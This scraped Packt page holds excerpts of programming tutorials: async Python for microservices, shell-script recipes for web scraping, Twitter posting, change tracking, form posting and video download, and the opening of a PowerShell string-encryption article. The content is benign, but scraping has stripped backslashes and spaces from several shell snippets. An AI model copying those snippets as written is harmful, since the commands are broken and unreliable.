take turns. Explicit instruction in the code will tell the event loop that this is where it can pause the execution. When that occurs, the process will look for some other pending work to resume. Eventually, the process will come back to your function and continue it where it stopped - moving from an execution context to another is called switching. The Greenlet project (https://github.com/python-greenlet/greenlet) is a package based on the Stackless project, a particular CPython implementation, and provides greenlets. Greenlets are pseudo-threads that are very cheap to instantiate, unlike real threads, and that can be used to call python functions. Within those functions, you can switch and give back the control to another function. The switching is done with an event loop and allows you to write an asynchronous application using a Thread-like interface paradigm. Here's an example from the Greenlet documentation def test1(x, y): z = gr2.switch(x+y) print z def test2(u): print u gr1.switch(42) gr1 = greenlet(test1) gr2 = greenlet(test2) gr1.switch("hello", " world") The two greenlets are explicitly switching from one to the other. For building microservices based on the WSGI standard, if the underlying code was using greenlets we could accept several concurrent requests and just switch from one to another when we know a call is going to block the request - like performing a SQL query. Although, switching from one greenlet to another has to be done explicitly, and the resulting code can quickly become messy and hard to understand. That's where Gevent can become very useful. The Gevent project (http://www.gevent.org/) is built on the top of Greenlet and offers among other things an implicit and automatic way of switching between greenlets. It provides a cooperative version of the socket module that will use greenlets to automatically pause and resume the execution when some data is made available in the socket. There's even a monkey patch feature that will automatically replace the standard lib socket with Gevent's version. That makes your standard synchronous code magically asynchronous every time it uses sockets - with just one extra line. from gevent import monkey; monkey.patch_all() def application(environ, start_response): headers = [('Content-type', 'application/json')] start_response('200 OK', headers) # ...do something with sockets here... return result This implicit magic comes with a price, though. For Gevent to work well, all the underlying code needs to be compatible with the patching Gevent is doing. Some packages from the community will continue to block or even have unexpected results because of this. In particular, if they use C extensions and bypass some of the features of the standard library Gevent patched. But for most cases, it works well. Projects that are playing well with Gevent are dubbed "green," and when a library is not functioning well, and the community asks its authors to "make it green," it usually happens. That's what was used to scale the Firefox Sync service at Mozilla for instance. Twisted and Tornado If you are building microservices where increasing the number of concurrent requests you can hold is important, it's tempting to drop the WSGI standard and just use an asynchronous framework like Tornado (http://www.tornadoweb.org/) or Twisted (https://twistedmatrix.com/trac/). Twisted has been around for ages. To implement the same microservices you need to write a slightly more verbose code: import time from twisted.web import server, resource from twisted.internet import reactor, endpoints class Simple(resource.Resource): isLeaf = True def render_GET(self, request): request.responseHeaders.addRawHeader(b"content-type", b"application/json") return bytes(json.dumps({'time': time.time()}), 'utf8') site = server.Site(Simple()) endpoint = endpoints.TCP4ServerEndpoint(reactor, 8080) endpoint.listen(site) reactor.run() While Twisted is an extremely robust and efficient framework, it suffers from a few problems when building HTTP microservices: You need to implement each endpoint in your microservice with a class derived from a Resource class, and that implements each supported method. For a few simple APIs, it adds a lot of boilerplate code. Twisted code can be hard to understand & debug due to its asynchronous nature. It's easy to fall into callback hell when you're chaining too many functions that are getting triggered successively one after the other - and the code can get messy Properly testing your Twisted application is hard, and you have to use Twisted-specific unit testing model. Tornado is based on a similar model but is doing a better job in some areas. It has a lighter routing system and does everything possible to make the code closer to plain Python. Tornado is also using a callback model, so debugging can be hard. But both frameworks are working hard at bridging the gap to rely on the new async features introduced in Python 3. asyncio When Guido van Rossum started to work on adding async features in Python 3, part of the community pushed for a Gevent-like solution because it made a lot of sense to write applications in a synchronous, sequential fashion - rather than having to add explicit callbacks like in Tornado or Twisted. But Guido picked the explicit technique and experimented in a project called Tulip that Twisted inspired. Eventually, asyncio was born out of that side project and added into Python. In hindsight, implementing an explicit event loop mechanism in Python instead of going the Gevent way makes a lot of sense. The way the Python core developers coded asyncio and how they elegantly extended the language with the async and await keywords to implement coroutines, made asynchronous applications built with vanilla Python 3.5+ code look very elegant and close to synchronous programming. By doing this, Python did a great job at avoiding the callback syntax mess we sometimes see in Node.js or Twisted (Python 2) applications. And beyond coroutines, Python 3 has introduced a full set of features and helpers in the asyncio package to build asynchronous applications, see https://docs.python.org/3/library/asyncio.html. Python is now as expressive as languages like Lua to create coroutine-based applications, and there are now a few emerging frameworks that have embraced those features and will only work with Python 3.5+ to benefit from this. KeepSafe's aiohttp (http://aiohttp.readthedocs.io) is one of them, and building the same microservice, fully asynchronous, with it would simply be these few elegant lines. from aiohttp import web import time async def handle(request): return web.json_response({'time': time.time()}) if __name__ == '__main__': app = web.Application() app.router.add_get('/', handle) web.run_app(app) In this small example, we're very close to how we would implement a synchronous app. The only hint we're async is the async keyword marking the handle function as being a coroutine. And that's what's going to be used at every level of an async Python app going forward. Here's another example using aiopg - a Postgresql lib for asyncio. From the project documentation: import asyncio import aiopg dsn = 'dbname=aiopg user=aiopg password=passwd host=127.0.0.1' async def go(): pool = await aiopg.create_pool(dsn) async with pool.acquire() as conn: async with conn.cursor() as cur: await cur.execute("SELECT 1") ret = [] async for row in cur: ret.append(row) assert ret == [(1,)] loop = asyncio.get_event_loop() loop.run_until_complete(go()) With a few async and await prefixes, the function that's performing a SQL query and send back the result looks a lot like a synchronous function. But asynchronous frameworks and libraries based on Python 3 are still emerging, and if you are using asyncio or a framework like aiohttp, you will need to stick with particular asynchronous implementations for each feature you need. If you require using a library that is not asynchronous in your code, using it from your asynchronous code means you will need to go through some extra and challenging work if you want to prevent blocking the event loop. If your microservices are dealing with a limited number of resources, it could be manageable. But it's probably a safer bet at this point (2017) to stick with a synchronous framework that's been around for a while rather than an asynchronous one. Let's enjoy the existing ecosystem of mature packages, and wait until the asyncio ecosystem gets more sophisticated. And there are many great synchronous frameworks to build microservices with Python, like Bottle, Pyramid with Cornice or Flask. Language performances In the previous sections we've been through the two different ways to write microservices - asynchronous vs. synchronous, and whatever technique you are using, the speed of Python is directly impacting the performance of your microservice. Of course, everyone knows Python is slower than Java or Go - but execution speed is not always the top priority. A microservice is often a thin layer of code that is sitting most of its life waiting for some network responses from other services. Its core speed is usually less important than how fast your SQL queries will take to return from your Postgres server because the latter will represent most of the time spent to build the response. But wanting an application that's as fast as possible is legitimate. One controversial topic in the Python community around speeding up the language is how the Global Interpreter Lock (GIL) mutex can ruin performances because multi-threaded applications cannot use several processes. The GIL has good reasons to exist. It protects non thread-safe parts of the CPython interpreter and exists in other languages like Ruby. And all attempts to remove it so far have failed to produce a faster CPython implementation. Larry Hasting is working on a GIL-free CPython project called Gilectomy - https://github.com/larryhastings/gilectomy - its minimal goal is to come up with a GIL-free implementation that can run a single-threaded application as fast as CPython. As of today (2017), this implementation is still slower that CPython. But it's interesting to follow this work and see if it reaches speed parity one day. That would make a GIL-free CPython very appealing. For microservices, besides preventing the usage of multiple cores in the same process, the GIL will slightly degrade performances on high load, because of the system calls overhead introduced by the mutex. Although, all the scrutiny around the GIL had one beneficial impact: some work has been done in the past years to reduce its contention in the interpreter, and in some area, Python performances have improved a lot. But bear in mind that even if the core team removes the GIL, Python is an interpreted language and the produced code will never be very efficient at execution time. Python provides the dis module if you are interested to see how the interpreter decomposes a function. In the example below, the interpreter will decompose a simple function that yields incremented values from a sequence in no less than 29 steps! >>> def myfunc(data): ... for value in data: ... yield value + 1 ... >>> import dis >>> dis.dis(myfunc) 2 0 SETUP_LOOP 23 (to 26) 3 LOAD_FAST 0 (data) 6 GET_ITER >> 7 FOR_ITER 15 (to 25) 10 STORE_FAST 1 (value) 3 13 LOAD_FAST 1 (value) 16 LOAD_CONST 1 (1) 19 BINARY_ADD 20 YIELD_VALUE 21 POP_TOP 22 JUMP_ABSOLUTE 7 >> 25 POP_BLOCK >> 26 LOAD_CONST 0 (None) 29 RETURN_VALUE A similar function written in a statically compiled language will dramatically reduce the number of operations required to produce the same result. There are ways to speed up Python execution, though. One is to write part of your code into compiled code by building C extensions or using a static extension of the language like Cython (http://cython.org/) - but that makes your code more complicated. Another solution, which is the most promising one, is by simply running your application using the PyPy interpreter (http://pypy.org/). PyPy implements a Just-In-Time compiler (JIT). This compiler is directly replacing at run time pieces of Python with machine code that can be directly used by the CPU. The whole trick for the JIT is to detect in real time, ahead of the execution, when and how to do it. Even if PyPy is always a few Python versions behind CPython, it reached a point where you can use it in production, and its performances can be quite amazing. In one of our projects at Mozilla that needs fast execution, the PyPy version was almost as fast as the Go version, and we've decided to use Python there instead. The Pypy Speed Center website is a great place to look at how PyPy compares to CPython - http://speed.pypy.org/ However, if your program uses C extensions, you will need to recompile them for PyPy, and that can be a problem. In particular, if other developers maintain some of the extensions you are using. But if you are building your microservice with a standard set of libraries, the chances are that will it work out of the box with the PyPy interpreter, so that's worth a try. In any case, for most projects, the benefits of Python and its ecosystem largely surpasses the performances issues described in this section because the overhead in a microservice is rarely a problem. Summary In this article we saw that Python is considered to be one of the best languages to write web applications, and therefore microservices - for the same reasons, it's a language of choice in other areas and also because it provides tons of mature frameworks and packages to do the work. Resources for Article: Further resources on this subject: Inbuilt Data Types in Python [article] Getting Started with Python Packages [article] Layout Management for Python GUI [article]
Read more
  • 0
  • 0
  • 42735

article-image-tangled-web-not-all
Packt
22 Jun 2017
20 min read
Save for later

Tangled Web? Not At All!

Packt
22 Jun 2017
20 min read
In this article by Clif Flynt, the author of the book Linux Shell Scripting Cookbook - Third Edition, we can see a collection of shell-scripting recipes that talk to services on the Internet. This articleis intended to help readers understand how to interact with the Web using shell scripts to automate tasks such as collecting and parsing data from web pages. This is discussed using POST and GET to web pages, writing clients to web services. (For more resources related to this topic, see here.) In this article, we will cover the following recipes: Downloading a web page as plain text Parsing data from a website Image crawler and downloader Web photo album generator Twitter command-line client Tracking changes to a website Posting to a web page and reading response Downloading a video from the Internet The Web has become the face of technology and the central access point for data processing. The primary interface to the web is via a browser that's designed for interactive use. That's great for searching and reading articles on the web, but you can also do a lot to automate your interactions with shell scripts. For instance, instead of checking a website daily to see if your favorite blogger has added a new blog, you can automate the check and be informed when there's new information. Similarly, twitter is the current hot technology for getting up-to-the-minute information. But if I subscribe to my local newspaper's twitter account because I want the local news, twitter will send me all news, including high-school sports that I don't care about. With a shell script, I can grab the tweets and customize my filters to match my desires, not rely on their filters. Downloading a web page as plain text Web pages are simply text with HTML tags, JavaScript and CSS. The HTML tags define the content of a web page, which we can parse for specific content. Bash scripts can parse web pages. An HTML file can be viewed in a web browser to see it properly formatted. Parsing a text document is simpler than parsing HTML data because we aren't required to strip off the HTML tags. Lynx is a command-line web browser which download a web page as plaintext. Getting Ready Lynx is not installed in all distributions, but is available via the package manager. # yum install lynx or apt-get install lynx How to do it... Let's download the webpage view, in ASCII character representation, in a text file by using the -dump flag with the lynx command: $ lynx URL -dump > webpage_as_text.txt This command will list all the hyperlinks <a href="link"> separately under a heading References, as the footer of the text output. This lets us parse links separately with regular expressions. For example: $lynx -dump http://google.com > plain_text_page.txt You can see the plaintext version of text by using the cat command: $ cat plain_text_page.txt Search [1]Images [2]Maps [3]Play [4]YouTube [5]News [6]Gmail [7]Drive [8]More » [9]Web History | [10]Settings | [11]Sign in [12]St. Patrick's Day 2017 _______________________________________________________ Google Search I'm Feeling Lucky [13]Advanced search [14]Language tools [15]Advertising Programs [16]Business Solutions [17]+Google [18]About Google © 2017 - [19]Privacy - [20]Terms References Parsing data from a website The lynx, sed, and awk commands can be used to mine data from websites. How to do it... Let's go through the commands used to parse details of actresses from the website: $ lynx -dump -nolist http://www.johntorres.net/BoxOfficefemaleList.html | grep -o "Rank-.*" | sed -e 's/ *Rank-([0-9]*) *(.*)/1t2/' | sort -nk 1 > actresslist.txt The output is: # Only 3 entries shown. All others omitted due to space limits 1 Keira Knightley 2 Natalie Portman 3 Monica Bellucci How it works... Lynx is a command-line web browser—it can dump a text version of a website as we would see in a web browser, instead of returning the raw html as wget or cURL do. This saves the step of removing HTML tags. The -nolist option shows the links without numbers. Parsing and formatting the lines that contain Rank is done with sed: sed -e 's/ *Rank-([0-9]*) *(.*)/1t2/' These lines are then sorted according to the ranks. See also The Downloading a web page as plain text recipe in this article explains the lynx command. Image crawler and downloader Image crawlers download all the images that appear in a web page. Instead of going through the HTML page by hand to pick the images, we can use a script to identify the images and download them automatically. How to do it... This Bash script will identify and download the images from a web page: #!/bin/bash #Desc: Images downloader #Filename: img_downloader.sh if [ $# -ne 3 ]; then echo "Usage: $0 URL -d DIRECTORY" exit -1 fi while [ -n $1 ] do case $1 in -d) shift; directory=$1; shift ;; *) url=$1; shift;; esac done mkdir -p $directory; baseurl=$(echo $url | egrep -o "https?://[a-z.-]+") echo Downloading $url curl -s $url | egrep -o "<imgsrc=[^>]*>" | sed's/<imgsrc="([^"]*).*/1/g' | sed"s,^/,$baseurl/,"> /tmp/$$.list cd $directory; while read filename; do echo Downloading $filename curl -s -O "$filename" --silent done < /tmp/$$.list An example usage is: $ ./img_downloader.sh http://www.flickr.com/search/?q=linux -d images How it works... The image downloader script reads an HTML page, strips out all tags except <img>, parses src="URL" from the <img> tag, and downloads them to the specified directory. This script accepts a web page URL and the destination directory as command-line arguments. The [ $# -ne 3 ] statement checks whether the total number of arguments to the script is three, otherwise it exits and returns a usage example. Otherwise, this code parses the URL and destination directory: while [ -n "$1" ] do case $1 in -d) shift; directory=$1; shift ;; *) url=${url:-$1}; shift;; esac done The while loop runs until all the arguments are processed. The shift command shifts arguments to the left so that $1 will take the next argument's value; that is, $2, and so on. Hence, we can evaluate all arguments through $1 itself. The case statement checks the first argument ($1). If that matches -d, the next argument must be a directory name, so the arguments are shifted and the directory name is saved. If the argument is any other string it is a URL. The advantage of parsing arguments in this way is that we can place the -d argument anywhere in the command line: $ ./img_downloader.sh -d DIR URL Or: $ ./img_downloader.sh URL -d DIR The egrep -o "<imgsrc=[^>]*>"code will print only the matching strings, which are the <img> tags including their attributes. The phrase [^>]*matches all the characters except the closing >, that is, <imgsrc="image.jpg">. sed's/<imgsrc="([^"]*).*/1/g' extracts the url from the string src="url". There are two types of image source paths—relative and absolute. Absolute paths contain full URLs that start with http:// or https://. Relative URLs starts with / or image_name itself. An example of an absolute URL is http://example.com/image.jpg. An example of a relative URL is /image.jpg. For relative URLs, the starting / should be replaced with the base URL to transform it to http://example.com/image.jpg. The script initializes the baseurl by extracting it from the initial url with the command: baseurl=$(echo $url | egrep -o "https?://[a-z.-]+") The output of the previously described sed command is piped into another sed command to replace a leading / with the baseurl, and the results are saved in a file named for the script's PID: /tmp/$$.list. sed"s,^/,$baseurl/,"> /tmp/$$.list The final while loop iterates through each line of the list and uses curl to downloas the images. The --silent argument is used with curl to avoid extra progress messages from being printed on the screen. The final while loop iterates through each line of the list and uses curl to downloas the images. The --silent argument is used with curl to avoid extra progress messages from being printed on the screen. Web photo album generator Web developers frequently create photo albums of full sized and thumbnail images. When a thumbnail is clicked, a large version of the picture is displayed. This requires resizing and placing many images. These actions can be automated with a simple bash script. The script creates thumbnails, places them in exact directories, and generates the code fragment for <img> tags automatically.  Web developers frequently create photo albums of full sized and thumbnail images. When a thumbnail is clicked, a large version of the picture is displayed. This requires resizing and placing many images. These actions can be automated with a simple bash script. The script creates thumbnails, places them in exact directories, and generates the code fragment for <img> tags automatically. Getting ready This script uses a for loop to iterate over every image in the current directory. The usual Bash utilities such as cat and convert (from the Image Magick package) are used. These will generate an HTML album, using all the images, in index.html. How to do it... This Bash script will generate an HTML album page: #!/bin/bash #Filename: generate_album.sh #Description: Create a photo album using images in current directory echo "Creating album.." mkdir -p thumbs cat <<EOF1 > index.html <html> <head> <style> body { width:470px; margin:auto; border: 1px dashed grey; padding:10px; } img { margin:5px; border: 1px solid black; } </style> </head> <body> <center><h1> #Album title </h1></center> <p> EOF1 for img in *.jpg; do convert "$img" -resize "100x""thumbs/$img" echo "<a href="$img">">>index.html echo "<imgsrc="thumbs/$img" title="$img" /></a>">> index.html done cat <<EOF2 >> index.html </p> </body> </html> EOF2 echo Album generated to index.html Run the script as follows: $ ./generate_album.sh Creating album.. Album generated to index.html How it works... The initial part of the script is used to write the header part of the HTML page. The following script redirects all the contents up to EOF1 to index.html: cat <<EOF1 > index.html contents... EOF1 The header includes the HTML and CSS styling. for img in *.jpg *.JPG; iterates over the file names and evaluates the body of the loop. convert "$img" -resize "100x""thumbs/$img" creates images of 100 px width as thumbnails. The following statements generate the required <img> tag and appends it to index.html: echo "<a href="$img">" echo "<imgsrc="thumbs/$img" title="$img" /></a>">> index.html Finally, the footer HTML tags are appended with cat as done in the first part of the script. Twitter command-line client Twitter is the hottest micro-blogging platform, as well as the latest buzz of the online social media now. We can use Twitter API to read tweets on our timeline from the command line! Twitter is the hottest micro-blogging platform, as well as the latest buzz of the online social media now. We can use Twitter API to read tweets on our timeline from the command line! Let's see how to do it. Getting ready Recently, Twitter stopped allowing people to log in by using plain HTTP Authentication, so we must use OAuth to authenticate ourselves.  Perform the following steps: Download the bash-oauth library from https://github.com/livibetter/bash-oauth/archive/master.zip, and unzip it to any directory. Go to that directory and then inside the subdirectory bash-oauth-master, run make install-all as root.Go to https://apps.twitter.com/ and register a new app. This will make it possible to use OAuth. After registering the new app, go to your app's settings and change Access type to Read and Write. Now, go to the Details section of the app and note two things—Consumer Key and Consumer Secret, so that you can substitute these in the script we are going to write. Great, now let's write the script that uses this. How to do it... This Bash script uses the OAuth library to read tweets or send your own updates. #!/bin/bash #Filename: twitter.sh #Description: Basic twitter client oauth_consumer_key=YOUR_CONSUMER_KEY oauth_consumer_scret=YOUR_CONSUMER_SECRET config_file=~/.$oauth_consumer_key-$oauth_consumer_secret-rc if [[ "$1" != "read" ]] && [[ "$1" != "tweet" ]]; then echo -e "Usage: $0 tweet status_messagen ORn $0 readn" exit -1; fi #source /usr/local/bin/TwitterOAuth.sh source bash-oauth-master/TwitterOAuth.sh TO_init if [ ! -e $config_file ]; then TO_access_token_helper if (( $? == 0 )); then echo oauth_token=${TO_ret[0]} > $config_file echo oauth_token_secret=${TO_ret[1]} >> $config_file fi fi source $config_file if [[ "$1" = "read" ]]; then TO_statuses_home_timeline'''YOUR_TWEET_NAME''10' echo $TO_ret | sed's/,"/n/g' | sed's/":/~/' | awk -F~ '{} {if ($1 == "text") {txt=$2;} else if ($1 == "screen_name") printf("From: %sn Tweet: %snn", $2, txt);} {}' | tr'"''' elif [[ "$1" = "tweet" ]]; then shift TO_statuses_update''"$@" echo 'Tweeted :)' fi Run the script as follows: $./twitter.sh read Please go to the following link to get the PIN: https://api.twitter.com/oauth/authorize?oauth_token=LONG_TOKEN_STRING PIN: PIN_FROM_WEBSITE Now you can create, edit and present Slides offline. - by A Googler $./twitter.sh tweet "I am reading Packt Shell Scripting Cookbook" Tweeted :) $./twitter.sh read | head -2 From: Clif Flynt Tweet: I am reading Packt Shell Scripting Cookbook How it works... First of all, we use the source command to include the TwitterOAuth.sh library, so we can use its functions to access Twitter. The TO_init function initializes the library. Every app needs to get an OAuth token and token secret the first time it is used. If these are not present, we use the library function TO_access_token_helper to acquire them. Once we have the tokens, we save them to a config file so we can simply source it the next time the script is run. The library function TO_statuses_home_timeline fetches the tweets from Twitter. This data is retuned as a single long string in JSON format, which starts like this: [{"created_at":"Thu Nov 10 14:45:20 +0000 "016","id":7...9,"id_str":"7...9","text":"Dining... Each tweet starts with the created_at tag and includes a text and a screen_nametag. The script will extract the text and screen name data and display only those fields. The script assigns the long string to the variable TO_ret. The JSON format uses quoted strings for the key and may or may not quote the value. The key/value pairs are separated by commas, and the key and value are separated by a colon :. The first sed to replaces each," character set with a newline, making each key/value a separate line. These lines are piped to another sed command to replace each occurrence of ": with a tilde ~ which creates a line like screen_name~"Clif_Flynt" The final awk script reads each line. The -F~ option splits the line into fields at the tilde, so $1 is the key and $2 is the value. The if command checks for text or screen_name. The text is first in the tweet, but it's easier to read if we report the sender first, so the script saves a text return until it sees a screen_name, then prints the current value of $2 and the saved value of the text. The TO_statuses_updatelibrary function generates a tweet. The empty first parameter defines our message as being in the default format, and the message is a part of the second parameter. Tracking changes to a website Tracking website changes is useful to both web developers and users. Checking a website manually impractical, but a change tracking script can be run at regular intervals. When a change occurs, it generate a notification. Getting ready Tracking changes in terms of Bash scripting means fetching websites at different times and taking the difference by using the diff command. We can use curl and diff to do this. How to do it... This bash script combines different commands, to track changes in a webpage: #!/bin/bash #Filename: change_track.sh #Desc: Script to track changes to webpage if [ $# -ne 1 ]; then echo -e "$Usage: $0 URLn" exit 1; fi first_time=0 # Not first time if [ ! -e "last.html" ]; then first_time=1 # Set it is first time run fi curl --silent $1 -o recent.html if [ $first_time -ne 1 ]; then changes=$(diff -u last.html recent.html) if [ -n "$changes" ]; then echo -e "Changes:n" echo "$changes" else echo -e "nWebsite has no changes" fi else echo "[First run] Archiving.." fi cp recent.html last.html Let's look at the output of the track_changes.sh script on a website you control. First we'll see the output when a web page is unchanged, and then after making changes. Note that you should change MyWebSite.org to your website name. First, run the following command: $ ./track_changes.sh http://www.MyWebSite.org [First run] Archiving.. Second, run the command again. $ ./track_changes.sh http://www.MyWebSite.org Website has no changes Third, run the following command after making changes to the web page: $ ./track_changes.sh http://www.MyWebSite.org Changes: --- last.html 2010-08-01 07:29:15.000000000 +0200 +++ recent.html 2010-08-01 07:29:43.000000000 +0200 @@ -1,3 +1,4 @@ +added line :) data How it works... The script checks whether the script is running for the first time by using [ ! -e "last.html" ];. If last.html doesn't exist, it means that it is the first time and, the webpage must be downloaded and saved as last.html. If it is not the first time, it downloads the new copy recent.html and checks the difference with the diff utility. Any changes will be displayed as diff output.Finally, recent.html is copied to last.html. Note that changing the website you're checking will generate a huge diff file the first time you examine it. If you need to track multiple pages, you can create a folder for each website you intend to watch. Posting to a web page and reading the response POST and GET are two types of requests in HTTP to send information to, or retrieve information from a website. In a GET request, we send parameters (name-value pairs) through the webpage URL itself. The POST command places the key/value pairs in the message body instead of the URL. POST is commonly used when submitting long forms or to conceal the information submitted from a casual glance. Getting ready For this recipe, we will use the sample guestbook website included in the tclhttpd package.  You can download tclhttpd from http://sourceforge.net/projects/tclhttpd and then run it on your local system to create a local webserver. The guestbook page requests a name and URL which it adds to a guestbook to show who has visited a site when the user clicks the Add me to your guestbook button. This process can be automated with a single curl (or wget) command. How to do it... Download the tclhttpd package and cd to the bin folder. Start the tclhttpd daemon with this command: tclsh httpd.tcl The format to POST and read the HTML response from generic website resembles this: $ curl URL -d "postvar=postdata2&postvar2=postdata2" Consider the following example: $ curl http://127.0.0.1:8015/guestbook/newguest.html -d "name=Clif&url=www.noucorp.com&http=www.noucorp.com" curl prints a response page like this: <HTML> <Head> <title>Guestbook Registration Confirmed</title> </Head> <Body BGCOLOR=white TEXT=black> <a href="www.noucorp.com">www.noucorp.com</a> <DL> <DT>Name <DD>Clif <DT>URL <DD> </DL> www.noucorp.com </Body> -d is the argument used for posting. The string argument for -d is similar to the GET request semantics. var=value pairs are to be delimited by &. You can POST the data using wget by using --post-data "string". For example: $ wgethttp://127.0.0.1:8015/guestbook/newguest.cgi --post-data "name=Clif&url=www.noucorp.com&http=www.noucorp.com" -O output.html Use the same format as cURL for name-value pairs. The text in output.html is the same as that returned by the cURL command. The string to the post arguments (for example, to -d or --post-data) should always be given in quotes. If quotes are not used, & is interpreted by the shell to indicate that this should be a background process. How to do it... If you look at the website source (use the View Source option from the web browser), you will see an HTML form defined, similar to the following code: <form action="newguest.cgi"" method="post"> <ul> <li> Name: <input type="text" name="name" size="40"> <li> Url: <input type="text" name="url" size="40"> <input type="submit"> </ul> </form> Here, newguest.cgi is the target URL. When the user enters the details and clicks on the Submit button, the name and url inputs are sent to newguest.cgi as a POST request, and the response page is returned to the browser. Downloading a video from the internet There are many reasons for downloading a video. If you are on a metered service, you might want to download videos during off-hours when the rates are cheaper. You might want to watch videos where the bandwidth doesn't support streaming, or you might just want to make certain that you always have that video of cute cats to show your friends. Getting ready One program for downloading videos is youtube-dl. This is not included in most distributions and the repositories may not be up to date, so it's best to go to the youtube-dl main site:http://yt-dl.org You'll find links and information on that page for downloading and installing youtube-dl. How to do it… Using youtube-dl is easy. Open your browser and find a video you like. Then copy/paste that URL to the youtube-dl command line. youtube-dl  https://www.youtube.com/watch?v=AJrsl3fHQ74 While youtube-dl is downloading the file it will generate a status line on your terminal. How it works… The youtube-dl program works by sending a GET message to the server, just as a browser would do. It masquerades as a browser so that YouTube or other video providers will download a video as if the device were streaming. The –list-formats (-F) option will list the available formats a video is available in, and the –format (-f) option will specify which format to download. This is useful if you want to download a higher-resolution video than your internet connection can reliably stream. Summary In this article we learned how to download and parse website data, send data to forms, and automate website-usage tasks and similar activities. We can automate many activities that we perform interactively through a browser with a few lines of scripting. Resources for Article: Further resources on this subject: Linux Shell Scripting – various recipes to help you [article] Linux Shell Script: Tips and Tricks [article] Linux Shell Script: Monitoring Activities [article]
Read more
  • 0
  • 0
  • 33382

article-image-string-encryption-and-decryption
Packt
22 Jun 2017
21 min read
Save for later

String Encryption and Decryption

Packt
22 Jun 2017
21 min read
In this article by Brenton J.W Blawat, author of the book Enterprise PowerShell Scripting Bootcamp, we will learn about string encryption and decryption. Large enterprises often have very strict security standards that are required by industry-specific regulations. When you are creating your Windows server scanning script, you will need to approach the script carefully with certain security concepts in mind. One of the most common situations you may encounter is the need to leverage sensitive data, such as credentials,in your script. While you could prompt for sensitive data during runtime, most enterprises want to automate the full script using zero-touch automation. (For more resources related to this topic, see here.) Zero-touch automation requires that the scripts are self-contained and have all of the required credentials and components to successfully run. The problem with incorporating sensitive data in the script, however, is that data can be obtained in clear text. The usage of clear text passwords in scripts is a bad practice, and violates many regulatory and security standards. As a result, PowerShell scripters need a method to securely store and retrieve sensitive data for use in their scripts. One of the popular methods to secure sensitive data is to encrypt the sensitive strings. This article explores RijndaelManaged symmetric encryption, and how to use it to encrypt and decrypt strings using PowerShell. In this article, we will cover the following topics: Learn about RijndaelManaged symmetric encryption Understand the salt, init, and password for the encryption algorithm Script a method to create randomized salt, init, and password values Encrypt and decrypt strings using RijndaelManaged encryption Create an encoding and data separation security mechanism for encryption passwords The examples in this article build upon each other. You will need to execute the script sequentially to have the final script in this article work properly. RijndaelManaged encryption When you are creating your scripts, it is best practice to leverage some sort of obfuscation, or encryption for sensitive data. There are many different strategies that you can use to secure your data. One is leveraging string and script encoding. Encoding takes your human readable string or script, and scrambles it to make it more difficult for someone to see what the actual code is. The downsides of encoding are that you must decode the script to make changes to it and decoding does not require the use of a password or passphrase. Thus, someone can easily decode your sensitive data using the same method you would use to decode the script. The alternative to encoding is leveraging an encryption algorithm. Encryption algorithms provide multiple mechanisms to secure your scripts and strings. While you can encrypt your entire script, it's most commonly used to encrypt the sensitive data in the scripts themselves, or answer files. One of the most popular encryption algorithms to use with PowerShell is RijndaelManaged. RijndaelManaged is a symmetric block cipher algorithm, which was selected by United States National Institute of Standards and Technology (NIST) for its implementation of Advanced Encryption Standard (AES). When using RijndaelManaged for the standard of AES, it supports 128-bit, 192-bit, and 256-bit encryption. In contrast to encoding, encryption algorithms require additional information to be able to properly encrypt and decrypt the string. When implementing the RijndaelManaged in PowerShell, the algorithm requires salt, a password, and the InitializationVector (IV). The salt is typically a randomized value that changes each time you leverage the encryption algorithm. The purpose of salt in a traditional encryption scenario is to change the encrypted value each time the encryption function is used. This is important in scenarios where you are encrypting multiple passwords or strings with the same value. If two users are using the same password, the encryption value in the database would also be the same. By changing the salt each time, the passwords, though the same value, would have different encrypted values in the database. In this article, we will be leveraging a static salt value. The password typically is a value that is manually entered by a user, or fed into the script using a parameter block. You can also derive the password value from a certificate, active directory attribute values, or a multitude of other sources. In this article, we will be leveraging three sources for the password. The InitializationVector (IV) is a hash generated from the IV string and is used for the EncryptionKey. The IV string is also typically a randomized value that changes each time you leverage the encryption algorithm. The purpose of the IV string is to strengthen the hash created by the encryption algorithm. This was created to thwart a hacker who is leveraging a rainbow attack using precalculated hash tables using no IV strings, or commonly used strings. Since you are setting the IV string, the number of hash combinations exponentially increases and it reduces the effectiveness of a rainbow attack. In this article, we will be using a static initialization vector value. The implementation of randomization of the salt and initialization vector strings become more important in scenarios where you are encrypting a large set of data. An attacker can intercept hundreds of thousands of packets, or strings,which reveals an increasing amount of information about your IV. With this, the attacker can guess the IV and derive the password. The most notable hack of IVs were with WiredEquivalentPrivacy (WEP) wireless protocol that used aweak, or small, initialization vector. After capturing enough packets, anIV hash could be guessed and a hacker could easily obtain the passphrase used on the wireless network. Creating random salt, initialization vector, and passwords As you are creating your scripts, you will want to make sure you use complex random values for the salt, IV string, and password. This is to prevent dictionary attacks where an individual may use common passwords and phrases to guess the salt, IV string, and password. When you create your salt and IVs, make sure they are a minimum of 10 random characters each. It is also recommended that you use a minimum of 30 random characters for the password. To create random passwords in PowerShell, you can do the following: Function create-password { # Declare password variable outside of loop. $password = "" # For numbers between 33 and 126 For ($a=33;$a –le 126;$a++) { # Add the Ascii text for the ascii number referenced. $ascii += ,[char][byte]$a } # Generate a random character form the $ascii character set. # Repeat 30 times, or create 30 random characters. 1..30 | ForEach { $password += $ascii | get-random } # Return the password return $password } # Create four 30 character passwords create-password create-password create-password create-password The output of this command would look like the following: This function will create a string with 30 random characters for use with random password creation. You first start by declaring the create-password function. You then declare the $password variable for use within the function by setting it equal to "". The next step is creating a For command to loop through a set of numbers. These numbers represent ASCII character numbers that you can select from for the password. You then create the For command by writing For ($a=33; $a -le 126;$a++). This means starting at the number 33, increase the value by one ($a++), and continue until the number is less than or equal to 126. You then declare the $ascii variable and construct the variable using the += assignment operator. As the For loop goes through its iterations, it adds a character to the array values. The script then leverages the [char] or character value of the [byte] number contained in $a. After this section, the $ascii array will contain an array of all the ASCII characters with the byte values between 33 and 126. You then continue to the random character generation. You declare the 1..30 command, which means for numbers 1 to 30, repeat the following command. You pipe this to ForEach {, which will designate for each of the 30 iterations. You then call the $ascii array and pipe it to | get-random cmdlet. The get-random cmdlet will randomly select one of the characters in the $ascii array. This value is then joined to the existing values in the $password string using the assignment operator +=. After the 30 iterations, there will be 30 random values in the $password variable. Lastly, you leverage return $password, to return this value to the script. After declaring the function, you call the function four times using create-password. This creates four random passwords for use. To create strings that are less than 30 random characters in length, you can modify the 1..30 to be any value that you want. If you want 15 random character Salt and Initialization Vector, you would use 1..15 instead. Encrypting and decrypting strings To start 